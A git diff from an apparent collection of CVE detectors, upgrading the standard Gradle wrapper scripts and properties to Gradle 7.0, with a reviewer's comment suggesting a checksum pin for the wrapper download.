+MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar 
@@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME 
@@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. 
+ # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX 
filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. 
+# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/community/detectors/bigip_cve_2022_1388/gradlew.bat b/community/detectors/bigip_cve_2022_1388/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/community/detectors/bigip_cve_2022_1388/gradlew.bat +++ b/community/detectors/bigip_cve_2022_1388/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows 
@@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line 
@@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/community/detectors/gitlab_cve_2021_22205/gradle/wrapper/gradle-wrapper.jar b/community/detectors/gitlab_cve_2021_22205/gradle/wrapper/gradle-wrapper.jar index 62d4c0535..d64cd4917 100644 Binary files a/community/detectors/gitlab_cve_2021_22205/gradle/wrapper/gradle-wrapper.jar and b/community/detectors/gitlab_cve_2021_22205/gradle/wrapper/gradle-wrapper.jar differ diff --git a/community/detectors/gitlab_cve_2021_22205/gradle/wrapper/gradle-wrapper.properties b/community/detectors/gitlab_cve_2021_22205/gradle/wrapper/gradle-wrapper.properties index 622ab64a3..d04736436 100644 --- a/community/detectors/gitlab_cve_2021_22205/gradle/wrapper/gradle-wrapper.properties +++ b/community/detectors/gitlab_cve_2021_22205/gradle/wrapper/gradle-wrapper.properties 
@@ -1,5 +1,7 @@ distributionBase=GRADLE_USER_HOME distributionPath=wrapper/dists -distributionUrl=https\://services.gradle.org/distributions/gradle-6.5-bin.zip +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true zipStoreBase=GRADLE_USER_HOME zipStorePath=wrapper/dists diff --git a/community/detectors/gitlab_cve_2021_22205/gradlew b/community/detectors/gitlab_cve_2021_22205/gradlew index fbd7c5158..1aa94a426 100755 --- a/community/detectors/gitlab_cve_2021_22205/gradlew +++ b/community/detectors/gitlab_cve_2021_22205/gradlew @@ -1,7 +1,7 @@ -#!/usr/bin/env sh +#!/bin/sh # -# Copyright 2015 the original author or authors. +# Copyright © 2015-2021 the original authors. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. 
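Review bot: No `distributionSha256Sum` is set in the updated `gradle-wrapper.properties` for `gitlab_cve_2021_22205`, so the gradle-7.0 archive fetched from `distributionUrl` is used without an integrity check. The added `validateDistributionUrl=true` appears to cover only the URL, not the downloaded content. Adding `distributionSha256Sum=<SHA-256 of gradle-7.0-bin.zip, taken from Gradle's published release checksums>` next to the `distributionUrl` line would pin the download. The same applies to the identical properties hunks for `gradio_cve_2023_51449` (a new file) and `influxdb_cve_2019_20933` further down. The replaced `gradle-wrapper.jar` binaries are opaque in this diff and are worth comparing against Gradle's published wrapper checksums before merging.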
@@ -17,67 +17,99 @@ # ############################################################################## -## -## Gradle start up script for UN*X -## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. +# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. 
+# ############################################################################## # Attempt to set APP_HOME + # Resolve links: $0 may be a link -PRG="$0" -# Need this for relative symlinks. -while [ -h "$PRG" ] ; do - ls=`ls -ld "$PRG"` - link=`expr "$ls" : '.*-> \(.*\)$'` - if expr "$link" : '/.*' > /dev/null; then - PRG="$link" - else - PRG=`dirname "$PRG"`"/$link" - fi +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) app_path=$APP_HOME$link ;; + esac done -SAVED="`pwd`" -cd "`dirname \"$PRG\"`/" >/dev/null -APP_HOME="`pwd -P`" -cd "$SAVED" >/dev/null -APP_NAME="Gradle" -APP_BASE_NAME=`basename "$0"` - -# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. -DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' +# This is normally unused +# shellcheck disable=SC2034 +APP_BASE_NAME=${0##*/} +# Discard cd standard output in case $CDPATH is set (https://github.com/gradle/gradle/issues/25036) +APP_HOME=$( cd "${APP_HOME:-./}" > /dev/null && pwd -P ) || exit # Use the maximum available, or set MAX_FD != -1 to use that value. -MAX_FD="maximum" +MAX_FD=maximum warn () { echo "$*" -} +} >&2 die () { echo echo "$*" echo exit 1 -} +} >&2 # OS specific support (must be 'true' or 'false'). cygwin=false msys=false darwin=false nonstop=false -case "`uname`" in - CYGWIN* ) - cygwin=true - ;; - Darwin* ) - darwin=true - ;; - MINGW* ) - msys=true - ;; - NONSTOP* ) - nonstop=true - ;; +case "$( uname )" in #( + CYGWIN* ) cygwin=true ;; #( + Darwin* ) darwin=true ;; #( + MSYS* | MINGW* ) msys=true ;; #( + NONSTOP* ) nonstop=true ;; esac CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar 
@@ -87,9 +119,9 @@ CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar if [ -n "$JAVA_HOME" ] ; then if [ -x "$JAVA_HOME/jre/sh/java" ] ; then # IBM's JDK on AIX uses strange locations for the executables - JAVACMD="$JAVA_HOME/jre/sh/java" + JAVACMD=$JAVA_HOME/jre/sh/java else - JAVACMD="$JAVA_HOME/bin/java" + JAVACMD=$JAVA_HOME/bin/java fi if [ ! -x "$JAVACMD" ] ; then die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME 
@@ -98,88 +130,120 @@ Please set the JAVA_HOME variable in your environment to match the location of your Java installation." fi else - JAVACMD="java" - which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. + JAVACMD=java + if ! command -v java >/dev/null 2>&1 + then + die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. Please set the JAVA_HOME variable in your environment to match the location of your Java installation." + fi fi # Increase the maximum file descriptors if we can. -if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then - MAX_FD_LIMIT=`ulimit -H -n` - if [ $? -eq 0 ] ; then - if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then - MAX_FD="$MAX_FD_LIMIT" - fi - ulimit -n $MAX_FD - if [ $? -ne 0 ] ; then - warn "Could not set maximum file descriptor limit: $MAX_FD" - fi - else - warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" - fi +if ! "$cygwin" && ! "$darwin" && ! "$nonstop" ; then + case $MAX_FD in #( + max*) + # In POSIX sh, ulimit -H is undefined. That's why the result is checked to see if it worked. + # shellcheck disable=SC2039,SC3045 + MAX_FD=$( ulimit -H -n ) || + warn "Could not query maximum file descriptor limit" + esac + case $MAX_FD in #( + '' | soft) :;; #( + *) + # In POSIX sh, ulimit -n is undefined. That's why the result is checked to see if it worked. 
+ # shellcheck disable=SC2039,SC3045 + ulimit -n "$MAX_FD" || + warn "Could not set maximum file descriptor limit to $MAX_FD" + esac fi -# For Darwin, add options to specify how the application appears in the dock -if $darwin; then - GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" -fi +# Collect all arguments for the java command, stacking in reverse order: +# * args from the command line +# * the main class name +# * -classpath +# * -D...appname settings +# * --module-path (only if needed) +# * DEFAULT_JVM_OPTS, JAVA_OPTS, and GRADLE_OPTS environment variables. # For Cygwin or MSYS, switch paths to Windows format before running java -if [ "$cygwin" = "true" -o "$msys" = "true" ] ; then - APP_HOME=`cygpath --path --mixed "$APP_HOME"` - CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` - - JAVACMD=`cygpath --unix "$JAVACMD"` - - # We build the pattern for arguments to be converted via cygpath - ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` - SEP="" - for dir in $ROOTDIRSRAW ; do - ROOTDIRS="$ROOTDIRS$SEP$dir" - SEP="|" - done - OURCYGPATTERN="(^($ROOTDIRS))" - # Add a user-defined pattern to the cygpath arguments - if [ "$GRADLE_CYGPATTERN" != "" ] ; then - OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" - fi +if "$cygwin" || "$msys" ; then + APP_HOME=$( cygpath --path --mixed "$APP_HOME" ) + CLASSPATH=$( cygpath --path --mixed "$CLASSPATH" ) + + JAVACMD=$( cygpath --unix "$JAVACMD" ) + # Now convert the arguments - kludge to limit ourselves to /bin/sh - i=0 - for arg in "$@" ; do - CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` - CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option - - if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition - eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` - else - eval `echo args$i`="\"$arg\"" + for arg do + if + case $arg in #( + -*) false ;; # don't mess with options #( + /?*) t=${arg#/} t=/${t%%/*} # looks like a POSIX 
filepath + [ -e "$t" ] ;; #( + *) false ;; + esac + then + arg=$( cygpath --path --ignore --mixed "$arg" ) fi - i=`expr $i + 1` + # Roll the args list around exactly as many times as the number of + # args, so each arg winds up back in the position where it started, but + # possibly modified. + # + # NB: a `for` loop captures its iteration list before it begins, so + # changing the positional parameters here affects neither the number of + # iterations, nor the values presented in `arg`. + shift # remove old arg + set -- "$@" "$arg" # push replacement arg done - case $i in - 0) set -- ;; - 1) set -- "$args0" ;; - 2) set -- "$args0" "$args1" ;; - 3) set -- "$args0" "$args1" "$args2" ;; - 4) set -- "$args0" "$args1" "$args2" "$args3" ;; - 5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; - 6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; - 7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; - 8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; - 9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; - esac fi -# Escape application args -save () { - for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done - echo " " -} -APP_ARGS=`save "$@"` -# Collect all arguments for the java command, following the shell quoting and substitution rules -eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" +# Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. +DEFAULT_JVM_OPTS='"-Xmx64m" "-Xms64m"' + +# Collect all arguments for the java command: +# * DEFAULT_JVM_OPTS, JAVA_OPTS, JAVA_OPTS, and optsEnvironmentVar are not allowed to contain shell fragments, +# and any embedded shellness will be escaped. 
+# * For example: A user cannot expect ${Hostname} to be expanded, as it is an environment variable and will be +# treated as '${Hostname}' itself on the command line. + +set -- \ + "-Dorg.gradle.appname=$APP_BASE_NAME" \ + -classpath "$CLASSPATH" \ + org.gradle.wrapper.GradleWrapperMain \ + "$@" + +# Stop when "xargs" is not available. +if ! command -v xargs >/dev/null 2>&1 +then + die "xargs is not available" +fi + +# Use "xargs" to parse quoted args. +# +# With -n1 it outputs one arg per line, with the quotes and backslashes removed. +# +# In Bash we could simply go: +# +# readarray ARGS < <( xargs -n1 <<<"$var" ) && +# set -- "${ARGS[@]}" "$@" +# +# but POSIX shell has neither arrays nor command substitution, so instead we +# post-process each arg (as a line of input to sed) to backslash-escape any +# character that might be a shell metacharacter, then use eval to reverse +# that process (while maintaining the separation between arguments), and wrap +# the whole thing up as a single "set" statement. +# +# This will of course break if any of these variables contains a newline or +# an unmatched quote. +# + +eval "set -- $( + printf '%s\n' "$DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS" | + xargs -n1 | + sed ' s~[^-[:alnum:]+,./:=@_]~\\&~g; ' | + tr '\n' ' ' + )" '"$@"' exec "$JAVACMD" "$@" diff --git a/community/detectors/gitlab_cve_2021_22205/gradlew.bat b/community/detectors/gitlab_cve_2021_22205/gradlew.bat index 5093609d5..93e3f59f1 100644 --- a/community/detectors/gitlab_cve_2021_22205/gradlew.bat +++ b/community/detectors/gitlab_cve_2021_22205/gradlew.bat @@ -14,7 +14,7 @@ @rem limitations under the License. @rem -@if "%DEBUG%" == "" @echo off +@if "%DEBUG%"=="" @echo off @rem ########################################################################## @rem @rem Gradle startup script for Windows 
@@ -25,7 +25,8 @@ if "%OS%"=="Windows_NT" setlocal set DIRNAME=%~dp0 -if "%DIRNAME%" == "" set DIRNAME=. +if "%DIRNAME%"=="" set DIRNAME=. +@rem This is normally unused set APP_BASE_NAME=%~n0 set APP_HOME=%DIRNAME% @@ -40,7 +41,7 @@ if defined JAVA_HOME goto findJavaFromJavaHome set JAVA_EXE=java.exe %JAVA_EXE% -version >NUL 2>&1 -if "%ERRORLEVEL%" == "0" goto init +if %ERRORLEVEL% equ 0 goto execute echo. echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. @@ -54,7 +55,7 @@ goto fail set JAVA_HOME=%JAVA_HOME:"=% set JAVA_EXE=%JAVA_HOME%/bin/java.exe -if exist "%JAVA_EXE%" goto init +if exist "%JAVA_EXE%" goto execute echo. echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% @@ -64,21 +65,6 @@ echo location of your Java installation. goto fail -:init -@rem Get command-line arguments, handling Windows variants - -if not "%OS%" == "Windows_NT" goto win9xME_args - -:win9xME_args -@rem Slurp the command line arguments. -set CMD_LINE_ARGS= -set _SKIP=2 - -:win9xME_args_slurp -if "x%~1" == "x" goto execute - -set CMD_LINE_ARGS=%* - :execute @rem Setup the command line 
@@ -86,17 +72,19 @@ set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar @rem Execute Gradle -"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% +"%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %* :end @rem End local scope for the variables with windows NT shell -if "%ERRORLEVEL%"=="0" goto mainEnd +if %ERRORLEVEL% equ 0 goto mainEnd :fail rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of rem the _cmd.exe /c_ return code! -if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 -exit /b 1 +set EXIT_CODE=%ERRORLEVEL% +if %EXIT_CODE% equ 0 set EXIT_CODE=1 +if not ""=="%GRADLE_EXIT_CONSOLE%" exit %EXIT_CODE% +exit /b %EXIT_CODE% :mainEnd if "%OS%"=="Windows_NT" endlocal diff --git a/community/detectors/gradio_cve_2023_51449/gradle/wrapper/gradle-wrapper.jar b/community/detectors/gradio_cve_2023_51449/gradle/wrapper/gradle-wrapper.jar new file mode 100644 index 000000000..d64cd4917 Binary files /dev/null and b/community/detectors/gradio_cve_2023_51449/gradle/wrapper/gradle-wrapper.jar differ diff --git a/community/detectors/gradio_cve_2023_51449/gradle/wrapper/gradle-wrapper.properties b/community/detectors/gradio_cve_2023_51449/gradle/wrapper/gradle-wrapper.properties new file mode 100644 index 000000000..d04736436 --- /dev/null +++ b/community/detectors/gradio_cve_2023_51449/gradle/wrapper/gradle-wrapper.properties @@ -0,0 +1,7 @@ +distributionBase=GRADLE_USER_HOME +distributionPath=wrapper/dists +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true +zipStoreBase=GRADLE_USER_HOME +zipStorePath=wrapper/dists 
diff --git a/community/detectors/gradio_cve_2023_51449/gradlew b/community/detectors/gradio_cve_2023_51449/gradlew new file mode 100755 index 000000000..1aa94a426 --- /dev/null +++ b/community/detectors/gradio_cve_2023_51449/gradlew 
@@ -0,0 +1,249 @@ +#!/bin/sh + +# +# Copyright © 2015-2021 the original authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# https://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# + +############################################################################## +# +# Gradle start up script for POSIX generated by Gradle. +# +# Important for running: +# +# (1) You need a POSIX-compliant shell to run this script. If your /bin/sh is +# noncompliant, but you have some other compliant shell such as ksh or +# bash, then to run this script, type that shell name before the whole +# command line, like: +# +# ksh Gradle +# +# Busybox and similar reduced shells will NOT work, because this script +# requires all of these POSIX shell features: +# * functions; +# * expansions «$var», «${var}», «${var:-default}», «${var+SET}», +# «${var#prefix}», «${var%suffix}», and «$( cmd )»; +# * compound commands having a testable exit status, especially «case»; +# * various built-in commands including «command», «set», and «ulimit». +# +# Important for patching: +# +# (2) This script targets any POSIX shell, so it avoids extensions provided +# by Bash, Ksh, etc; in particular arrays are avoided. +# +# The "traditional" practice of packing multiple parameters into a +# space-separated string is a well documented source of bugs and security +# problems, so this is (mostly) avoided, by progressively accumulating +# options in "$@", and eventually passing that to Java. 
+# +# Where the inherited environment variables (DEFAULT_JVM_OPTS, JAVA_OPTS, +# and GRADLE_OPTS) rely on word-splitting, this is performed explicitly; +# see the in-line comments for details. +# +# There are tweaks for specific operating systems such as AIX, CygWin, +# Darwin, MinGW, and NonStop. +# +# (3) This script is generated from the Groovy template +# https://github.com/gradle/gradle/blob/HEAD/subprojects/plugins/src/main/resources/org/gradle/api/internal/plugins/unixStartScript.txt +# within the Gradle project. +# +# You can find Gradle at https://github.com/gradle/gradle/. +# +############################################################################## + +# Attempt to set APP_HOME + +# Resolve links: $0 may be a link +app_path=$0 + +# Need this for daisy-chained symlinks. +while + APP_HOME=${app_path%"${app_path##*/}"} # leaves a trailing /; empty if no leading path + [ -h "$app_path" ] +do + ls=$( ls -ld "$app_path" ) + link=${ls#*' -> '} + case $link in #( + /*) app_path=$link ;; #( + *) 